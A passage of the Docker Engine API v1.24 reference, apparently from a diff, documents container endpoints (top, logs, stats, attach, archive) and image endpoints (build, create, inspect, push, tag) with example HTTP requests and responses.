application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **details** - 1/True/true or 0/False/flase, Show extra details provided to logs. Default `false`. +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. + +**Example request**: + + GET /v1.24/containers/redis1/stats HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "read" : "2015-01-08T22:57:31.547920715Z", + "pids_stats": { + "current": 3 + }, + "networks": { + "eth0": { + "rx_bytes": 5338, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 36, + "tx_bytes": 648, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 8 + }, + "eth5": { + "rx_bytes": 4641, + "rx_dropped": 0, + "rx_errors": 0, + "rx_packets": 26, + "tx_bytes": 690, + "tx_dropped": 0, + "tx_errors": 0, + "tx_packets": 9 + } + }, + "memory_stats" : { + "stats" : { + "total_pgmajfault" : 0, + "cache" : 0, + "mapped_file" : 0, + "total_inactive_file" : 0, + "pgpgout" : 414, + "rss" : 6537216, + "total_mapped_file" : 0, + "writeback" : 0, + "unevictable" : 0, + "pgpgin" : 477, + "total_unevictable" : 0, + "pgmajfault" : 0, + "total_rss" : 6537216, + "total_rss_huge" : 6291456, + "total_writeback" : 0, + "total_inactive_anon" : 0, + "rss_huge" : 6291456, + "hierarchical_memory_limit" : 67108864, + "total_pgfault" : 964, + "total_active_file" : 0, + "active_anon" : 6537216, + "total_active_anon" : 6537216, + "total_pgpgout" : 414, + "total_cache" : 0, + "inactive_anon" : 0, + "active_file" : 0, + "pgfault" : 964, + "inactive_file" : 0, + "total_pgpgin" : 477 + }, + "max_usage" : 6651904, + "usage" : 6537216, + "failcnt" : 0, + "limit" : 67108864 + }, + "blkio_stats" : {}, + "cpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24472255, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100215355, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 739306590000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + }, + "precpu_stats" : { + "cpu_usage" : { + "percpu_usage" : [ + 8646879, + 24350896, + 36438778, + 30657443 + ], + "usage_in_usermode" : 50000000, + "total_usage" : 100093996, + "usage_in_kernelmode" : 30000000 + }, + "system_cpu_usage" : 9492140000000, + "throttling_data" : {"periods":0,"throttled_periods":0,"throttled_time":0} + } + } + +The precpu_stats is the cpu statistic of last read, which is used for calculating the cpu usage percent. It is not the exact copy of the “cpu_stats” field. + +**Query parameters**: + +- **stream** – 1/True/true or 0/False/false, pull stats once then disconnect. Default `true`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Resize a container TTY + +`POST /containers/(id or name)/resize` + +Resize the TTY for container with `id`. The unit is number of characters. You must restart the container for the resize to take effect. + +**Example request**: + + POST /v1.24/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **h** – height of `tty` session +- **w** – width + +**Status codes**: + +- **200** – no error +- **404** – No such container +- **500** – Cannot resize container + +#### Start a container + +`POST /containers/(id or name)/start` + +Start the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/start HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. + +**Status codes**: + +- **204** – no error +- **304** – container already started +- **404** – no such container +- **500** – server error + +#### Stop a container + +`POST /containers/(id or name)/stop` + +Stop the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/stop?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **304** – container already stopped +- **404** – no such container +- **500** – server error + +#### Restart a container + +`POST /containers/(id or name)/restart` + +Restart the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/restart?t=5 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **t** – number of seconds to wait before killing the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Kill a container + +`POST /containers/(id or name)/kill` + +Kill the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/kill HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **signal** - Signal to send to the container: integer or string like `SIGINT`. + When not set, `SIGKILL` is assumed and the call waits for the container to exit. + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Update a container + +`POST /containers/(id or name)/update` + +Update configuration of one or more containers. + +**Example request**: + + POST /v1.24/containers/e90e34656806/update HTTP/1.1 + Content-Type: application/json + + { + "BlkioWeight": 300, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0", + "Memory": 314572800, + "MemorySwap": 514288000, + "MemoryReservation": 209715200, + "KernelMemory": 52428800, + "RestartPolicy": { + "MaximumRetryCount": 4, + "Name": "on-failure" + }, + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Warnings": [] + } + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Rename a container + +`POST /containers/(id or name)/rename` + +Rename the container `id` to a `new_name` + +**Example request**: + + POST /v1.24/containers/e90e34656806/rename?name=new_name HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **name** – new name for the container + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **409** - conflict name already assigned +- **500** – server error + +#### Pause a container + +`POST /containers/(id or name)/pause` + +Pause the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/pause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Unpause a container + +`POST /containers/(id or name)/unpause` + +Unpause the container `id` + +**Example request**: + + POST /v1.24/containers/e90e34656806/unpause HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** – no error +- **404** – no such container +- **500** – server error + +#### Attach to a container + +`POST /containers/(id or name)/attach` + +Attach to the container `id` + +**Example request**: + + POST /v1.24/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **400** – bad parameter +- **404** – no such container +- **409** - container is paused +- **500** – server error + +**Stream details**: + +When using the TTY setting is enabled in +[`POST /containers/create` +](#create-a-container), +the stream is the raw data from the process PTY and client's `stdin`. +When the TTY is disabled, then the stream is multiplexed to separate +`stdout` and `stderr`. + +The format is a **Header** and a **Payload** (frame). + +**HEADER** + +The header contains the information which the stream writes (`stdout` or +`stderr`). It also contains the size of the associated frame encoded in the +last four bytes (`uint32`). + +It is encoded on the first eight bytes like this: + + header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4} + +`STREAM_TYPE` can be: + +- 0: `stdin` (is written on `stdout`) +- 1: `stdout` +- 2: `stderr` + +`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of +the `uint32` size encoded as big endian. + +**PAYLOAD** + +The payload is the raw stream. + +**IMPLEMENTATION** + +The simplest way to implement the Attach protocol is the following: + + 1. Read eight bytes. + 2. Choose `stdout` or `stderr` depending on the first byte. + 3. Extract the frame size from the last four bytes. + 4. Read the extracted size and output it on the correct output. + 5. Goto 1. + +#### Attach to a container (websocket) + +`GET /containers/(id or name)/attach/ws` + +Attach to the container `id` via websocket + +Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455) + +**Example request** + + GET /v1.24/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1 + +**Example response** + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **detachKeys** – Override the key sequence for detaching a + container. Format is a single character `[a-Z]` or `ctrl-` + where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`. +- **logs** – 1/True/true or 0/False/false, return logs. Default `false`. +- **stream** – 1/True/true or 0/False/false, return stream. + Default `false`. +- **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach + to `stdin`. Default `false`. +- **stdout** – 1/True/true or 0/False/false, if `logs=true`, return + `stdout` log, if `stream=true`, attach to `stdout`. Default `false`. +- **stderr** – 1/True/true or 0/False/false, if `logs=true`, return + `stderr` log, if `stream=true`, attach to `stderr`. Default `false`. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **404** – no such container +- **500** – server error + +#### Wait a container + +`POST /containers/(id or name)/wait` + +Block until container `id` stops, then returns the exit code + +**Example request**: + + POST /v1.24/containers/16253994b7c4/wait HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"StatusCode": 0} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Remove a container + +`DELETE /containers/(id or name)` + +Remove the container `id` from the filesystem + +**Example request**: + + DELETE /v1.24/containers/16253994b7c4?v=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Query parameters**: + +- **v** – 1/True/true or 0/False/false, Remove the volumes + associated to the container. Default `false`. +- **force** - 1/True/true or 0/False/false, Kill then remove the container. + Default `false`. + +**Status codes**: + +- **204** – no error +- **400** – bad parameter +- **404** – no such container +- **409** – conflict +- **500** – server error + +#### Retrieving information about files and folders in a container + +`HEAD /containers/(id or name)/archive` + +See the description of the `X-Docker-Container-Path-Stat` header in the +following section. + +#### Get an archive of a filesystem resource in a container + +`GET /containers/(id or name)/archive` + +Get a tar archive of a resource in the filesystem of container `id`. + +**Query parameters**: + +- **path** - resource in the container's filesystem to archive. Required. + + If not an absolute path, it is relative to the container's root directory. + The resource specified by **path** must exist. To assert that the resource + is expected to be a directory, **path** should end in `/` or `/.` + (assuming a path separator of `/`). If **path** ends in `/.` then this + indicates that only the contents of the **path** directory should be + copied. A symlink is always resolved to its target. + + > **Note**: It is not possible to copy certain system files such as resources + > under `/proc`, `/sys`, `/dev`, and mounts created by the user in the + > container. + +**Example request**: + + GET /v1.24/containers/8cce319429b2/archive?path=/root HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + X-Docker-Container-Path-Stat: eyJuYW1lIjoicm9vdCIsInNpemUiOjQwOTYsIm1vZGUiOjIxNDc0ODQwOTYsIm10aW1lIjoiMjAxNC0wMi0yN1QyMDo1MToyM1oiLCJsaW5rVGFyZ2V0IjoiIn0= + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +On success, a response header `X-Docker-Container-Path-Stat` will be set to a +base64-encoded JSON object containing some filesystem header information about +the archived resource. The above example value would decode to the following +JSON object (whitespace added for readability): + +```json +{ + "name": "root", + "size": 4096, + "mode": 2147484096, + "mtime": "2014-02-27T20:51:23Z", + "linkTarget": "" +} +``` + +A `HEAD` request can also be made to this endpoint if only this information is +desired. + +**Status codes**: + +- **200** - success, returns archive of copied resource +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** was asserted to be a directory but exists as a + file) +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** does not exist) +- **500** - server error + +#### Extract an archive of files or folders to a directory in a container + +`PUT /containers/(id or name)/archive` + +Upload a tar archive to be extracted to a path in the filesystem of container +`id`. + +**Query parameters**: + +- **path** - path to a directory in the container + to extract the archive's contents into. Required. + + If not an absolute path, it is relative to the container's root directory. + The **path** resource must exist. +- **noOverwriteDirNonDir** - If "1", "true", or "True" then it will be an error + if unpacking the given content would cause an existing directory to be + replaced with a non-directory and vice versa. + +**Example request**: + + PUT /v1.24/containers/8cce319429b2/archive?path=/vol1 HTTP/1.1 + Content-Type: application/x-tar + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – the content was extracted successfully +- **400** - client error, bad parameter, details in JSON response body, one of: + - must specify path parameter (**path** cannot be empty) + - not a directory (**path** should be a directory but exists as a file) + - unable to overwrite existing directory with non-directory + (if **noOverwriteDirNonDir**) + - unable to overwrite existing non-directory with directory + (if **noOverwriteDirNonDir**) +- **403** - client error, permission denied, the volume + or container rootfs is marked as read-only. +- **404** - client error, resource not found, one of: + – no such container (container `id` does not exist) + - no such file or directory (**path** resource does not exist) +- **500** – server error + +### 3.2 Images + +#### List Images + +`GET /images/json` + +**Example request**: + + GET /v1.24/images/json?all=0 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "RepoTags": [ + "ubuntu:12.04", + "ubuntu:precise", + "ubuntu:latest" + ], + "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c", + "Created": 1365714795, + "Size": 131506275, + "VirtualSize": 131506275, + "Labels": {} + }, + { + "RepoTags": [ + "ubuntu:12.10", + "ubuntu:quantal" + ], + "ParentId": "27cf784147099545", + "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc", + "Created": 1364102658, + "Size": 24653, + "VirtualSize": 180116135, + "Labels": { + "com.example.version": "v1" + } + } + ] + +**Example request, with digest information**: + + GET /v1.24/images/json?digests=1 HTTP/1.1 + +**Example response, with digest information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Created": 1420064636, + "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125", + "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2", + "RepoDigests": [ + "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags": [ + "localhost:5000/test/busybox:latest", + "playdate:latest" + ], + "Size": 0, + "VirtualSize": 2429728, + "Labels": {} + } + ] + +The response shows a single image `Id` associated with two repositories +(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use +either of the `RepoTags` values `localhost:5000/test/busybox:latest` or +`playdate:latest` to reference the image. + +You can also use `RepoDigests` values to reference an image. In this response, +the array has only one reference and that is to the +`localhost:5000/test/busybox` repository; the `playdate` repository has no +digest. You can reference this digest using the value: +`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...` + +See the `docker run` and `docker build` commands for examples of digest and tag +references on the command line. + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, default false +- **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters: + - `dangling=true` + - `label=key` or `label="key=value"` of an image label + - `before`=(`[:]`, `` or ``) + - `since`=(`[:]`, `` or ``) +- **filter** - only return images with the specified name + +#### Build image from a Dockerfile + +`POST /build` + +Build an image from a Dockerfile + +**Example request**: + + POST /v1.24/build HTTP/1.1 + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"stream": "Step 1/5..."} + {"stream": "..."} + {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}} + +The input stream must be a `tar` archive compressed with one of the +following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`. + +The archive must include a build instructions file, typically called +`Dockerfile` at the archive's root. The `dockerfile` parameter may be +used to specify a different build instructions file. To do this, its value must be +the path to the alternate build instructions file to use. + +The archive may include any number of other files, +which are accessible in the build context (See the [*ADD build +command*](../reference/builder.md#add)). + +The Docker daemon performs a preliminary validation of the `Dockerfile` before +starting the build, and returns an error if the syntax is incorrect. After that, +each instruction is run one-by-one until the ID of the new image is output. + +The build is canceled if the client drops the connection by quitting +or being killed. + +**Query parameters**: + +- **dockerfile** - Path within the build context to the `Dockerfile`. This is + ignored if `remote` is specified and points to an external `Dockerfile`. +- **t** – A name and optional tag to apply to the image in the `name:tag` format. + If you omit the `tag` the default `latest` value is assumed. + You can provide one or more `t` parameters. +- **remote** – A Git repository URI or HTTP/HTTPS context URI. If the + URI points to a single text file, the file's contents are placed into + a file called `Dockerfile` and the image is built from that file. If + the URI points to a tarball, the file is downloaded by the daemon and + the contents therein used as the context for the build. If the URI + points to a tarball and the `dockerfile` parameter is also specified, + there must be a file with the corresponding path inside the tarball. +- **q** – Suppress verbose build output. +- **nocache** – Do not use the cache when building the image. +- **pull** - Attempt to pull the image even if an older image exists locally. +- **rm** - Remove intermediate containers after a successful build (default behavior). +- **forcerm** - Always remove intermediate containers (includes `rm`). +- **memory** - Set memory limit for build. +- **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap. +- **cpushares** - CPU shares (relative weight). +- **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`). +- **cpuperiod** - The length of a CPU period in microseconds. +- **cpuquota** - Microseconds of CPU time that the container can get in a CPU period. +- **buildargs** – JSON map of string pairs for build-time variables. Users pass + these values at build-time. Docker uses the `buildargs` as the environment + context for command(s) run via the Dockerfile's `RUN` instruction or for + variable expansion in other Dockerfile instructions. This is not meant for + passing secret values. [Read more about the buildargs instruction](../reference/builder.md#arg) +- **shmsize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. +- **labels** – JSON map of string pairs for labels to set on the image. + +**Request Headers**: + +- **Content-type** – Set to `"application/tar"`. +- **X-Registry-Config** – A base64-url-safe-encoded Registry Auth Config JSON + object with the following structure: + + { + "docker.example.com": { + "username": "janedoe", + "password": "hunter2" + }, + "https://index.docker.io/v1/": { + "username": "mobydock", + "password": "conta1n3rize14" + } + } + + This object maps the hostname of a registry to an object containing the + "username" and "password" for that registry. Multiple registries may + be specified as the build may be based on an image requiring + authentication to pull from any arbitrary registry. Only the registry + domain name (and port if not the default "443") are required. However + (for legacy reasons) the "official" Docker, Inc. hosted registry must + be specified with both a "https://" prefix and a "/v1/" suffix even + though Docker will prefer to use the v2 registry API. + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Create an image + +`POST /images/create` + +Create an image either by pulling it from the registry or by importing it + +**Example request**: + + POST /v1.24/images/create?fromImage=busybox&tag=latest HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pulling..."} + {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}} + {"error": "Invalid..."} + ... + +When using this endpoint to pull an image from the registry, the +`X-Registry-Auth` header can be used to include +a base64-encoded AuthConfig object. + +**Query parameters**: + +- **fromImage** – Name of the image to pull. The name may include a tag or + digest. This parameter may only be used when pulling an image. + The pull is cancelled if the HTTP connection is closed. +- **fromSrc** – Source to import. The value may be a URL from which the image + can be retrieved or `-` to read the image from the request body. + This parameter may only be used when importing an image. +- **repo** – Repository name given to an image when it is imported. + The repo may include a tag. This parameter may only be used when importing + an image. +- **tag** – Tag or digest. If empty when pulling an image, this causes all tags + for the given image to be pulled. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com" + } + ``` + + - Token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** - repository does not exist or no read access +- **500** – server error + + + +#### Inspect an image + +`GET /images/(name)/json` + +Return low-level information on the image `name` + +**Example request**: + + GET /v1.24/images/example/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Id" : "sha256:85f05633ddc1c50679be2b16a0479ab6f7637f8884e0cfe0f4d20e1ebb3d6e7c", + "Container" : "cb91e48a60d01f1e27028b4fc6819f4f290b3cf12496c8176ec714d0d390984a", + "Comment" : "", + "Os" : "linux", + "Architecture" : "amd64", + "Parent" : "sha256:91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "ContainerConfig" : { + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Domainname" : "", + "AttachStdout" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "NetworkDisabled" : false, + "OnBuild" : [], + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "User" : "", + "WorkingDir" : "", + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "Labels" : { + "com.example.license" : "GPL", + "com.example.version" : "1.0", + "com.example.vendor" : "Acme" + }, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts" : null, + "Cmd" : [ + "/bin/sh", + "-c", + "#(nop) LABEL com.example.vendor=Acme com.example.license=GPL com.example.version=1.0" + ] + }, + "DockerVersion" : "1.9.0-dev", + "VirtualSize" : 188359297, + "Size" : 0, + "Author" : "", + "Created" : "2015-09-10T08:30:53.26995814Z", + "GraphDriver" : { + "Name" : "aufs", + "Data" : null + }, + "RepoDigests" : [ + "localhost:5000/test/busybox/example@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf" + ], + "RepoTags" : [ + "example:1.0", + "example:latest", + "example:stable" + ], + "Config" : { + "Image" : "91e54dfb11794fad694460162bf0cb0a4fa710cfa3f60979c177d920813e267c", + "NetworkDisabled" : false, + "OnBuild" : [], + "StdinOnce" : false, + "PublishService" : "", + "AttachStdin" : false, + "OpenStdin" : false, + "Domainname" : "", + "AttachStdout" : false, + "Tty" : false, + "Hostname" : "e611e15f9c9d", + "Volumes" : null, + "Cmd" : [ + "/bin/bash" + ], + "ExposedPorts" : null, + "Env" : [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "Labels" : { + "com.example.vendor" : "Acme", + "com.example.version" : "1.0", + "com.example.license" : "GPL" + }, + "Entrypoint" : null, + "MacAddress" : "", + "AttachStderr" : false, + "WorkingDir" : "", + "User" : "" + }, + "RootFS": { + "Type": "layers", + "Layers": [ + "sha256:1834950e52ce4d5a88a1bbd131c537f4d0e56d10ff0dd69e66be3b7dfa9df7e6", + "sha256:5f70bf18a086007016e948b04aed3b82103a36bea41755b6cddfaf10ace3c6ef" + ] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Get the history of an image + +`GET /images/(name)/history` + +Return the history of the image `name` + +**Example request**: + + GET /v1.24/images/ubuntu/history HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "3db9c44f45209632d6050b35958829c3a2aa256d81b9a7be45b362ff85c54710", + "Created": 1398108230, + "CreatedBy": "/bin/sh -c #(nop) ADD file:eb15dbd63394e063b805a3c32ca7bf0266ef64676d5a6fab4801f2e81e2a5148 in /", + "Tags": [ + "ubuntu:lucid", + "ubuntu:10.04" + ], + "Size": 182964289, + "Comment": "" + }, + { + "Id": "6cfa4d1f33fb861d4d114f43b25abd0ac737509268065cdfd69d544a59c85ab8", + "Created": 1398108222, + "CreatedBy": "/bin/sh -c #(nop) MAINTAINER Tianon Gravi - mkimage-debootstrap.sh -i iproute,iputils-ping,ubuntu-minimal -t lucid.tar.xz lucid http://archive.ubuntu.com/ubuntu/", + "Tags": null, + "Size": 0, + "Comment": "" + }, + { + "Id": "511136ea3c5a64f264b78b5433614aec563103b4d4702f3ba7d4d2698e22c158", + "Created": 1371157430, + "CreatedBy": "", + "Tags": [ + "scratch12:latest", + "scratch:latest" + ], + "Size": 0, + "Comment": "Imported from -" + } + ] + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Push an image on the registry + +`POST /images/(name)/push` + +Push the image `name` on the registry + +**Example request**: + + POST /v1.24/images/test/push HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "Pushing..."} + {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}} + {"error": "Invalid..."} + ... + +If you wish to push an image on to a private registry, that image must already have a tag +into a repository which references that registry `hostname` and `port`. This repository name should +then be used in the URL. This duplicates the command line's flow. + +The push is cancelled if the HTTP connection is closed. + +**Example request**: + + POST /v1.24/images/registry.acme.com:5000/test/push HTTP/1.1 + + +**Query parameters**: + +- **tag** – The tag to associate with the image on the registry. This is optional. + +**Request Headers**: + +- **X-Registry-Auth** – base64-encoded AuthConfig object, containing either login information, or a token + - Credential based login: + + ``` + { + "username": "jdoe", + "password": "secret", + "email": "jdoe@acme.com", + } + ``` + + - Identity token based login: + + ``` + { + "identitytoken": "9cbaf023786cd7..." + } + ``` + +**Status codes**: + +- **200** – no error +- **404** – no such image +- **500** – server error + +#### Tag an image into a repository + +`POST /images/(name)/tag` + +Tag the image `name` into a repository + +**Example request**: + + POST /v1.24/images/test/tag?repo=myrepo&tag=v42 HTTP/1.1 + +**Example response**: + + HTTP/1.1 201 Created + +**Query parameters**: + +- **repo** – The repository to tag in +- **tag** - The new tag name + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – 